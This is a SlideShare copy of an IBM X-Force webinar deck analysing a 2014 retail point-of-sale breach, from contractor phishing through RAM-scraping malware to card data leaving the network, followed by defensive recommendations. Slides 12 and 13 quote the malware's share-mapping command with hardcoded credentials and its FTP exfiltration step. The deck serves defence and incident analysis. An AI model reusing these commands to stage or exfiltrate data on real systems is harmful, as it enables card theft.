SlideShare a Scribd company logo

Anatomy of an Advanced Retail Breach

Download as PPTX, PDF
IBM Security
IBM Security

1. The document discusses an advanced retail breach where an attacker was able to access a third party contractor's system after phishing their credentials, use that to access the retailer's internal file server, infect POS systems with malware to scrape credit card data from RAM, send the data to an internal server, and then exfiltrate it to external FTP servers in Russia. 2. The IBM X-Force monitors threats and educates customers on security challenges. It analyzed this attack to understand how the attacker was able to compromise systems and extract card data without detection. 3. The document provides recommendations to prevent similar attacks, such as endpoint protection, network segmentation, monitoring and detection of anomalies, and incident response planning.

Technology
1 of 23
IBM Security Systems Anatomy of an Advanced Retail Breach Chris Poulin Research Strategist, X-Force February 2014 © 2014 IBM Corporation 1 © 2012 IBM Corporation
IBM Security Systems Agenda  About the IBM X-Force  Dissection of a retail attack and data breach  Solutions to prevent similar compromises Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM. 2 © 2014 IBM Corporation
IBM Security Systems X-Force is the foundation for advanced security and threat research across the IBM Security Framework The mission of X-Force is to:  Monitor and evaluate the rapidly changing threat landscape  Research new attack techniques and develop protection for tomorrow’s security challenges  Educate our customers and the general public 3 © 2014 IBM Corporation
IBM Security Systems Collaborative IBM teams monitor and analyze the changing threat landscape Coverage Depth 20,000+ devices 17B analyzed under contract 3,700+ managed clients worldwide 15B+ events managed per day 133 monitored countries (MSS) 1,000+ security related patents 4 web pages & images 40M spam & phishing attacks 73K documented vulnerabilities Billions of intrusion attempts daily Millions of unique malware samples © 2014 IBM Corporation
IBM Security Systems Anatomy of the Breach Attacker phishes a 3rd party contractor 4 Malware scrapes RAM for clear text CC stripe data Attacker finds & infects POS systems w/malware 1 3b Attacker uses stolen credentials to access contractor portals 2 Retailer POS systems 5 Attacker finds & infects internal Windows file server Malware sends CC data to internal server; sends custom ping to notify 3a Contractor portals Firewall 6 Attacker FTP servers (external/Russia) 5 Retailer Windows file server Stolen data is exfiltrated to FTP servers internal network © 2014 IBM Corporation
IBM Security Systems 1. Phish a 3rd Party Contractor Attacker phishes a 3rd party contractor 1  HVAC firm in PA  Email malware campaign  Citadel password stealing bot, variant of Zeus banking trojan  Primary method of malware detection free version of Malwarebytes Anti-Malware  On-demand scanning; not for commercial use  Supplier portal contains lots of public information – Example: list of resources for HVAC companies 6 © 2014 IBM Corporation
IBM Security Systems 2. Access & exploit contractor portal Attacker uses stolen credentials to access contractor portal 2 service.ariba.com 216.109.104.11 NS @ ariba.com Contractor portal Contractors generally not required to use token or other 2-factor authentication amlogin.ewips.partnersonline.com 161.225.202.98, NS @ retailer.com pdzone.retailer.com, 61.225.130.104, NS @ retailer.com 7 © 2014 IBM Corporation
IBM Security Systems 3a. Discover & exploit internal file server Attacker finds & infects internal Windows file server 3a  Exact method of movement from portal to internal server unknown  Probably not HVAC partner—cloud-based, not on retailer extranet Retailer Windows file server  Back-end connect from partner portal or other retailer owned asset?  SQL injection, browser exploit, open ingress port, who knows?  Or maybe contractors had access to internal network to monitor HVAC systems remotely 8 © 2014 IBM Corporation
IBM Security Systems 3a. Discover & exploit internal file server (cont’d) Attacker finds & infects internal Windows file server 3a  Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata – Created by username John.Doe – Printed recently on Windows DOMAIN  Google search easily reveals location of retail datacenters: Retailer Windows file server  Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers) – Username=―Best1_user‖; password=―BackupU$r‖ – Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC – Installed as ―BladeLogic‖, hiding as BMC component, BladeLogic Automation Suite; however, BMC doesn’t name any component ―bladelogic.exe‖ – System / Administrator level account; can run batch jobs 9 © 2014 IBM Corporation
IBM Security Systems 3b. Find & infect POS systems With a point of presence on an internal server, it’s all unicorns and rainbows from here. Evil unicorns Attacker finds & infects POS systems w/malware 3b Retailer POS systems Retailer Windows file server Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/ 10 © 2014 IBM Corporation
IBM Security Systems 4. Malware scrapes card data from RAM 4 Malware scrapes RAM for clear text CC stripe data  Trojan.POSRAM, variant of BlackPOS  No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure Retailer POS systems  Looks for ―pos.exe‖ process  Installs trojan, creates registry entries containing string ―POSWDS‖  Scrape RAM for track 1 and track 2 data of financial cards  Card track data is encrypted – Between the reader and POS, and – again between the POS and payment processor  Unencrypted momentarily at the POS as the transaction is cleared  Debit card PINs are hashed at the card reader  Chip-and-PIN encrypts the transaction from the card to processor  Stores stolen card data in file %SystemRoot%system32winxml.dll 11 © 2014 IBM Corporation
IBM Security Systems 5. Harvested card data is sent to internal rally point  Moves stolen card data to a central collection point  Assumes POS systems have no internet access  Creates temp Windows share on domain  Malware on rally point creates share in %windir%twain_32 Retailer POS systems Malware sends CC data to internal server; sends custom ping to notify 5  Encodes base64, with encoding string JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau  Moves winxml.dll to <RallyPoint>_<Day>_<Mon>_<Hr>.txt  POS malware sends custom ICMP to as semaphore Retailer Windows file server net use S: <HardCodedIP>c$WINDOWStwain_32 /user:Best1_user BackupU$r move %windir%system32winxml.dll S:<InfectedMachineName>_<Day>_<Month>_<Hour>.txt” net use S: /del 12 © 2014 IBM Corporation
IBM Security Systems 6. Card data is exfiltrated to FTP servers in Russia  Compiles all card dumps into c:windowstwain_32a.dll  Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin  Generates an FTP script and executes ftp –s <path>cmd.txt 6 Attacker FTP servers (external/Russia) 13 Retailer Windows file server Stolen data is exfiltrated to FTP servers © 2014 IBM Corporation
IBM Security Systems Protect endpoints  The ultimate prize: – POS systems: where the card data is processed – File servers: base of operations – Web servers: initial incursion vector – Contractor workstations: intelligence, credentials  Malware protection: – Contractor workstations (phishing, Citadel bot) – POS systems: RAM scraper trojan – File servers: data management and exfiltration tools – Application isolation (Intel SGX; micro-virtualization, etc) to prevent RAM scraping  Patch  Configuration management 14 © 2014 IBM Corporation
IBM Security Systems Protection against web and file server compromises  Secure development lifecycle (SDLC) – Secure coding practices training – Static/source code analysis—manual (code review) and automated – Dynamic code analysis (esp low hanging fruit: SQL injection & XSS) – Include compiled application, web applications, mobile apps  Go-live security process – Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords) – Install appropriate endpoint protection and configuration management – Vulnerability scan  Appropriate authentication – Separate domains / administrative credentials (identity separation) – Multi-factor authentication 15 © 2014 IBM Corporation
IBM Security Systems Segment critical assets  Enumerate & classify Image source: http://nationalgeographic.com  Restrict web assets’ access to internal systems  Isolate public / partner facing assets from private assets  Segment operational technology (OT), critical assets, and general IT  Perform firewall rule analysis, paying special attention to: – assets containing sensitive data, such as cardholder information – risky protocols and flow directions  For example, POS systems shouldn’t – mount Windows shares, or – send regular ICMP packets 16 © 2014 IBM Corporation
IBM Security Systems Monitor & detect: network  Network activity pattern monitoring can detect: – Suspicious scanning activity as attacker maps out the network landscape – Policy violations for outbound FTP, especially to Eastern Bloc countries  Network packet inspection can detect: – IPS can stop SQL injection, XSS, other more advanced attacks – Credit card number patterns in outbound data – Suspect strings in ICMP packets – Identify network traffic that is not what it seems: e.g., • Non-DNS protocol over port 53 • IRC over port 80 17 © 2014 IBM Corporation
IBM Security Systems Monitor & detect: vulnerability and anomaly detection  Vulnerability scanning, including deep endpoint assessment – example: registry entries containing ―POSWDS‖  Anomaly detection – Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access) – Detect deviations from baseline: • POS connecting to Windows shares • POS emitting ICMP packets – General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP – Profile ICMP packet sizes, normal payload contents; identify & block deviations 18 © 2014 IBM Corporation
IBM Security Systems Incident Response  Speedy and complete forensics – early in the process if the compromise is detected before data is stolen, or – after a severe breach when accurate impact analysis is critical: • Which systems were compromised? • How many customers were affected? • How much of the data comprised personal information?  Instrument everything feasible, – include POS systems and network activity – Enrich with context from • vulnerability assessment tools • change management transactions • security intelligence feeds. 19 © 2014 IBM Corporation
IBM Security Systems Incident / emergency response  Plan should include – Detection – Response and escalation – Engaging law enforcement as appropriate – Preservation of evidence – Compliance with regulations and contractual agreements – Customer and press notification – Public relations.  Engage your contracted external emergency response agency in advance – Help you prepare for a breach and – Gather context about your environment.  Test your process regularly  Business associate contract and assessment 20 © 2014 IBM Corporation
IBM Security Systems At IBM, the world is our security lab Security Operations Centers Security Research and Development Labs Institute for Advanced Security Branches More than 6,000 21 IBM researchers, developers, and subject matter experts ALL focused on security 3,000 IBM security patents v13-01 © 2014 IBM Corporation
Get Engaged with IBM X-Force Research and Development Follow us at @ibmsecurity and @ibmxforce Download X-Force security trend & risk reports http://www.ibm.com/security/xforce/ Subscribe to X-Force alerts at iss.net/rss.php or IBM Security blog at www.securityintelligence.com 22 IBM Security © 2014 IBM Corporation
IBM Security Systems Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY. www.ibm.com/security © Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others. 23 © 2014 IBM Corporation

Recommended

CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
Aditya K Sood
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ Vikjava
Security Bootcamp
 
Ch02 System Threats and Risks
Ch02 System Threats and RisksCh02 System Threats and Risks
Ch02 System Threats and Risks
Information Technology
 
Zeus
ZeusZeus
Zeus
MaGn3t0
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
G Prachi
 
System hacking
System hackingSystem hacking
System hacking
CAS
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile Attack
IRJET Journal
 
Surat peringatan kilat kepada Kelompok Ransomware Kuba
Surat peringatan kilat kepada Kelompok Ransomware KubaSurat peringatan kilat kepada Kelompok Ransomware Kuba
Surat peringatan kilat kepada Kelompok Ransomware Kuba
System 021
 

Recommended

CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
Aditya K Sood
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ Vikjava
Security Bootcamp
 
Ch02 System Threats and Risks
Ch02 System Threats and RisksCh02 System Threats and Risks
Ch02 System Threats and Risks
Information Technology
 
Zeus
ZeusZeus
Zeus
MaGn3t0
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
G Prachi
 
System hacking
System hackingSystem hacking
System hacking
CAS
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile Attack
IRJET Journal
 
Surat peringatan kilat kepada Kelompok Ransomware Kuba
Surat peringatan kilat kepada Kelompok Ransomware KubaSurat peringatan kilat kepada Kelompok Ransomware Kuba
Surat peringatan kilat kepada Kelompok Ransomware Kuba
System 021
 
Program security chapter 3
Program security chapter 3Program security chapter 3
Program security chapter 3
Education
 
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for OrganizationsMitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
Digital Shadows
 
CNIT 123: Ch 6: Enumeration
CNIT 123: Ch 6: EnumerationCNIT 123: Ch 6: Enumeration
CNIT 123: Ch 6: Enumeration
Sam Bowne
 
Ch09 Performing Vulnerability Assessments
Ch09 Performing Vulnerability AssessmentsCh09 Performing Vulnerability Assessments
Ch09 Performing Vulnerability Assessments
Information Technology
 
Security A to Z: Glossary of the most important terms
Security A to Z: Glossary of the most important termsSecurity A to Z: Glossary of the most important terms
Security A to Z: Glossary of the most important terms
F-Secure Corporation
 
Sam sam
Sam sam Sam sam
Sam sam
malvvv
 
Network defenses
Network defensesNetwork defenses
Network defenses
G Prachi
 
MITRE ATT&CK and 2017 FSB Indictment
MITRE ATT&CK and 2017 FSB IndictmentMITRE ATT&CK and 2017 FSB Indictment
MITRE ATT&CK and 2017 FSB Indictment
Digital Shadows
 
Mitre ATTACK and the North Korean Regime-Backed Programmer
Mitre ATTACK and the North Korean Regime-Backed ProgrammerMitre ATTACK and the North Korean Regime-Backed Programmer
Mitre ATTACK and the North Korean Regime-Backed Programmer
Digital Shadows
 
Mapping the ASD Essential 8 to the Mitre ATTACK™ framework
Mapping the ASD Essential 8 to the Mitre ATTACK™ frameworkMapping the ASD Essential 8 to the Mitre ATTACK™ framework
Mapping the ASD Essential 8 to the Mitre ATTACK™ framework
Digital Shadows
 
Ch 6: Enumeration
Ch 6: EnumerationCh 6: Enumeration
Ch 6: Enumeration
Sam Bowne
 
Web Application Security 101 - 07 Session Management
Web Application Security 101 - 07 Session ManagementWeb Application Security 101 - 07 Session Management
Web Application Security 101 - 07 Session Management
Websecurify
 
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-tDefcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
Priyanka Aash
 
Attacking Session Management
Attacking Session ManagementAttacking Session Management
Attacking Session Management
Sehan Lee
 
Web Security
Web SecurityWeb Security
Web Security
Randy Connolly
 
Ransomware - Rameez Shahzada
Ransomware - Rameez ShahzadaRansomware - Rameez Shahzada
Ransomware - Rameez Shahzada
RAMEEZ SHAHZADA
 
Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7
Jesse Burke
 
Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More Manageable
IBM Security
 
Nuts & Bolts of the Dynamic Attack Chain
Nuts & Bolts of the Dynamic Attack ChainNuts & Bolts of the Dynamic Attack Chain
Nuts & Bolts of the Dynamic Attack Chain
IBM Security
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
IBM Security
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
Greater Noida Institute Of Technology
 
Symantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit AnalysisSymantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit Analysis
Symantec
 

More Related Content

What's hot

Program security chapter 3
Program security chapter 3Program security chapter 3
Program security chapter 3
Education
 
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for OrganizationsMitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
Digital Shadows
 
CNIT 123: Ch 6: Enumeration
CNIT 123: Ch 6: EnumerationCNIT 123: Ch 6: Enumeration
CNIT 123: Ch 6: Enumeration
Sam Bowne
 
Ch09 Performing Vulnerability Assessments
Ch09 Performing Vulnerability AssessmentsCh09 Performing Vulnerability Assessments
Ch09 Performing Vulnerability Assessments
Information Technology
 
Security A to Z: Glossary of the most important terms
Security A to Z: Glossary of the most important termsSecurity A to Z: Glossary of the most important terms
Security A to Z: Glossary of the most important terms
F-Secure Corporation
 
Sam sam
Sam sam Sam sam
Sam sam
malvvv
 
Network defenses
Network defensesNetwork defenses
Network defenses
G Prachi
 
MITRE ATT&CK and 2017 FSB Indictment
MITRE ATT&CK and 2017 FSB IndictmentMITRE ATT&CK and 2017 FSB Indictment
MITRE ATT&CK and 2017 FSB Indictment
Digital Shadows
 
Mitre ATTACK and the North Korean Regime-Backed Programmer
Mitre ATTACK and the North Korean Regime-Backed ProgrammerMitre ATTACK and the North Korean Regime-Backed Programmer
Mitre ATTACK and the North Korean Regime-Backed Programmer
Digital Shadows
 
Mapping the ASD Essential 8 to the Mitre ATTACK™ framework
Mapping the ASD Essential 8 to the Mitre ATTACK™ frameworkMapping the ASD Essential 8 to the Mitre ATTACK™ framework
Mapping the ASD Essential 8 to the Mitre ATTACK™ framework
Digital Shadows
 
Ch 6: Enumeration
Ch 6: EnumerationCh 6: Enumeration
Ch 6: Enumeration
Sam Bowne
 
Web Application Security 101 - 07 Session Management
Web Application Security 101 - 07 Session ManagementWeb Application Security 101 - 07 Session Management
Web Application Security 101 - 07 Session Management
Websecurify
 
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-tDefcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
Priyanka Aash
 
Attacking Session Management
Attacking Session ManagementAttacking Session Management
Attacking Session Management
Sehan Lee
 
Web Security
Web SecurityWeb Security
Web Security
Randy Connolly
 
Ransomware - Rameez Shahzada
Ransomware - Rameez ShahzadaRansomware - Rameez Shahzada
Ransomware - Rameez Shahzada
RAMEEZ SHAHZADA
 
Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7
Jesse Burke
 

What's hot (17)

Program security chapter 3
Program security chapter 3Program security chapter 3
Program security chapter 3
 
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for OrganizationsMitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
Mitre ATT&CK and the Mueller GRU Indictment: Lessons for Organizations
 
CNIT 123: Ch 6: Enumeration
CNIT 123: Ch 6: EnumerationCNIT 123: Ch 6: Enumeration
CNIT 123: Ch 6: Enumeration
 
Ch09 Performing Vulnerability Assessments
Ch09 Performing Vulnerability AssessmentsCh09 Performing Vulnerability Assessments
Ch09 Performing Vulnerability Assessments
 
Security A to Z: Glossary of the most important terms
Security A to Z: Glossary of the most important termsSecurity A to Z: Glossary of the most important terms
Security A to Z: Glossary of the most important terms
 
Sam sam
Sam sam Sam sam
Sam sam
 
Network defenses
Network defensesNetwork defenses
Network defenses
 
MITRE ATT&CK and 2017 FSB Indictment
MITRE ATT&CK and 2017 FSB IndictmentMITRE ATT&CK and 2017 FSB Indictment
MITRE ATT&CK and 2017 FSB Indictment
 
Mitre ATTACK and the North Korean Regime-Backed Programmer
Mitre ATTACK and the North Korean Regime-Backed ProgrammerMitre ATTACK and the North Korean Regime-Backed Programmer
Mitre ATTACK and the North Korean Regime-Backed Programmer
 
Mapping the ASD Essential 8 to the Mitre ATTACK™ framework
Mapping the ASD Essential 8 to the Mitre ATTACK™ frameworkMapping the ASD Essential 8 to the Mitre ATTACK™ framework
Mapping the ASD Essential 8 to the Mitre ATTACK™ framework
 
Ch 6: Enumeration
Ch 6: EnumerationCh 6: Enumeration
Ch 6: Enumeration
 
Web Application Security 101 - 07 Session Management
Web Application Security 101 - 07 Session ManagementWeb Application Security 101 - 07 Session Management
Web Application Security 101 - 07 Session Management
 
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-tDefcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
Defcon 22-alex zacharis-nikolaos-tsagkarakis-po s-attacking-t
 
Attacking Session Management
Attacking Session ManagementAttacking Session Management
Attacking Session Management
 
Web Security
Web SecurityWeb Security
Web Security
 
Ransomware - Rameez Shahzada
Ransomware - Rameez ShahzadaRansomware - Rameez Shahzada
Ransomware - Rameez Shahzada
 
Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7
 

Similar to Anatomy of an Advanced Retail Breach

Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More Manageable
IBM Security
 
Nuts & Bolts of the Dynamic Attack Chain
Nuts & Bolts of the Dynamic Attack ChainNuts & Bolts of the Dynamic Attack Chain
Nuts & Bolts of the Dynamic Attack Chain
IBM Security
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
IBM Security
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
Greater Noida Institute Of Technology
 
Symantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit AnalysisSymantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit Analysis
Symantec
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Attack Autopsy: A Study of the Dynamic Attack Chain
Attack Autopsy: A Study of the Dynamic Attack ChainAttack Autopsy: A Study of the Dynamic Attack Chain
Attack Autopsy: A Study of the Dynamic Attack Chain
IBM Security
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
Tenet Systems Pvt Ltd
 
ransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptxransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptx
dawitTerefe5
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
belsis
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical Hacking
Sripati Mahapatra
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
Geoff Pesimo
 
Is Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacksIs Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacksMaarten Van Horenbeeck
 
Part3- Offline traffic monitoring In this part will use a PCAP file to.docx
Part3- Offline traffic monitoring In this part will use a PCAP file to.docxPart3- Offline traffic monitoring In this part will use a PCAP file to.docx
Part3- Offline traffic monitoring In this part will use a PCAP file to.docx
farrahkur54
 
PCI Compliance white paper
PCI Compliance white paper PCI Compliance white paper
PCI Compliance white paper
HelpSystems
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
DefCamp
 

Similar to Anatomy of an Advanced Retail Breach (20)

Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More Manageable
 
Nuts & Bolts of the Dynamic Attack Chain
Nuts & Bolts of the Dynamic Attack ChainNuts & Bolts of the Dynamic Attack Chain
Nuts & Bolts of the Dynamic Attack Chain
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Symantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit AnalysisSymantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit Analysis
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Attack Autopsy: A Study of the Dynamic Attack Chain
Attack Autopsy: A Study of the Dynamic Attack ChainAttack Autopsy: A Study of the Dynamic Attack Chain
Attack Autopsy: A Study of the Dynamic Attack Chain
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
ransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptxransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptx
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical Hacking
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
 
Is Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacksIs Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacks
 
Part3- Offline traffic monitoring In this part will use a PCAP file to.docx
Part3- Offline traffic monitoring In this part will use a PCAP file to.docxPart3- Offline traffic monitoring In this part will use a PCAP file to.docx
Part3- Offline traffic monitoring In this part will use a PCAP file to.docx
 
PCI Compliance white paper
PCI Compliance white paper PCI Compliance white paper
PCI Compliance white paper
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
 

More from IBM Security

Automation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOpsAutomation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOps
IBM Security
 
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
IBM Security
 
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
IBM Security
 
Integrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM ResilientIntegrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM Resilient
IBM Security
 
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
IBM Security
 
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
IBM Security
 
Accelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon BlackAccelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon Black
IBM Security
 
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent OrchestrationHow to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
IBM Security
 
Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?
IBM Security
 
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat IntelligenceOrchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
